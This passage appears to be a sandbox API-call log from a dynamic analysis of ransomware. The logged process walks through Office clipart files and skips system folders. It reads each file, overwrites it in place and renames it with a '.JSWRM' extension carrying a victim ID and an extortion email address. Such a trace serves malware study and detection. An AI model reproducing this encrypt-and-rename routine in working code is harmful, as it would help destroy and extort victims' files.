CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105320.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105320.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0080.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0080.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105320.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105320.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105320.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0080.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0080.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0080.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0080.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.950] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2020) returned 1 [0080.950] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e0) returned 0x20c6c0 [0080.950] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0080.952] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.952] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0080.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0080.952] CloseHandle (hObject=0x314) returned 1 [0080.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0080.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0080.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0080.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0080.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0080.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0080.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0080.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0080.952] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0080.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0080.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0080.953] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f38, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105328.WMF", cAlternateFileName="")) returned 1 [0080.953] lstrcmpiW (lpString1="J0105328.WMF", lpString2=".") returned 1 [0080.953] lstrcmpiW (lpString1="J0105328.WMF", lpString2="..") returned 1 [0080.953] lstrcmpiW (lpString1="J0105328.WMF", lpString2="...") returned 1 [0080.953] lstrcmpiW (lpString1="J0105328.WMF", lpString2="windows") returned -1 [0080.953] lstrcmpiW (lpString1="J0105328.WMF", lpString2="recovery") returned -1 [0080.953] lstrcmpiW (lpString1="J0105328.WMF", lpString2="perflogs") returned -1 [0080.953] lstrcmpiW (lpString1="J0105328.WMF", lpString2="documents and settings") returned 1 [0080.953] lstrcmpiW (lpString1="J0105328.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.953] lstrcmpiW (lpString1="J0105328.WMF", lpString2="system volume information") returned -1 [0080.953] lstrcmpiW (lpString1="J0105328.WMF", lpString2="msocache") returned -1 [0080.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0080.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105328.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105328.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105328.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0080.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105328.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105328.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105328.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0080.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0080.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.954] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7992) returned 1 [0080.954] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f30) returned 0x205850 [0080.954] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f30, lpOverlapped=0x0) returned 1 [0080.956] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.956] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f30, lpOverlapped=0x0) returned 1 [0080.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.956] CloseHandle (hObject=0x314) returned 1 [0080.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0080.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0080.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0080.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0080.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0080.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0080.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.957] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0080.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0080.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.958] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x290c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105332.WMF", cAlternateFileName="")) returned 1 [0080.958] lstrcmpiW (lpString1="J0105332.WMF", lpString2=".") returned 1 [0080.958] lstrcmpiW (lpString1="J0105332.WMF", lpString2="..") returned 1 [0080.958] lstrcmpiW (lpString1="J0105332.WMF", lpString2="...") returned 1 [0080.958] lstrcmpiW (lpString1="J0105332.WMF", lpString2="windows") returned -1 [0080.958] lstrcmpiW (lpString1="J0105332.WMF", lpString2="recovery") returned -1 [0080.958] lstrcmpiW (lpString1="J0105332.WMF", lpString2="perflogs") returned -1 [0080.958] lstrcmpiW (lpString1="J0105332.WMF", lpString2="documents and settings") returned 1 [0080.958] lstrcmpiW (lpString1="J0105332.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.958] lstrcmpiW (lpString1="J0105332.WMF", lpString2="system volume information") returned -1 [0080.958] lstrcmpiW (lpString1="J0105332.WMF", lpString2="msocache") returned -1 [0080.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0080.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105332.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105332.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105332.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0080.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0080.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105332.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105332.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105332.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0080.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0080.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0080.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0080.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.959] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10508) returned 1 [0080.959] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2900) returned 0x24d210 [0080.959] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2900, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2900, lpOverlapped=0x0) returned 1 [0080.961] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.961] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2900, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2900, lpOverlapped=0x0) returned 1 [0080.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.961] CloseHandle (hObject=0x314) returned 1 [0080.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0080.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0080.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0080.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0080.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0080.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0080.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.962] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0080.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0080.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0080.963] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb54, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105336.WMF", cAlternateFileName="")) returned 1 [0080.963] lstrcmpiW (lpString1="J0105336.WMF", lpString2=".") returned 1 [0080.963] lstrcmpiW (lpString1="J0105336.WMF", lpString2="..") returned 1 [0080.963] lstrcmpiW (lpString1="J0105336.WMF", lpString2="...") returned 1 [0080.963] lstrcmpiW (lpString1="J0105336.WMF", lpString2="windows") returned -1 [0080.963] lstrcmpiW (lpString1="J0105336.WMF", lpString2="recovery") returned -1 [0080.963] lstrcmpiW (lpString1="J0105336.WMF", lpString2="perflogs") returned -1 [0080.963] lstrcmpiW (lpString1="J0105336.WMF", lpString2="documents and settings") returned 1 [0080.963] lstrcmpiW (lpString1="J0105336.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.963] lstrcmpiW (lpString1="J0105336.WMF", lpString2="system volume information") returned -1 [0080.963] lstrcmpiW (lpString1="J0105336.WMF", lpString2="msocache") returned -1 [0080.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0080.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105336.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105336.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105336.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0080.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105336.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105336.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105336.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0080.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0080.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0080.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105336.wmf"), dwDesiredAccess=0xc0000000, 